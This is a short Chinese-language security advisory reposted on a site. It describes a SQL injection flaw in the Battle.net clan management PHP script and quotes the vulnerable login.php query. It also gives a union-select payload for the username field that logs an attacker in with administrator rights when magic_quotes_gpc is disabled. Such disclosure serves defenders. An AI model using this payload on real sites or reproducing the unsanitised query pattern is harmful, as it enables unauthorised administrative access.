首页 网络安全 安全学院 查看内容

美国暴雪[魔兽世界] 官方程序漏洞

2009-2-12 01:40 573 0

摘要: Battle.net clan管理系统使用MySQL后端,允许用户方便的升级和维护web站点。 系统实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击...
关键词: 攻击者 user 漏洞 password line pass 验证 权限 输入 攻击

Battle.net clan管理系统使用MySQL后端,允许用户方便的升级和维护web站点。 系统实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击,非授权获取系统的管理权限。 Battle.net clan的login.php脚本没有正确地验证通过index.php对user参数的输入: line 9 --> $user = $_POST['user'];line 10--> $pass = $_POST['pass']; ............... line 21--> mysql_query("Select * FROM bcs_members Where name='$user' AND password='$pass'", $link); 允许攻击者以管理员权限登录。但成功攻击要求禁用了magic_quotes_gpc。 Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*password : enything
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部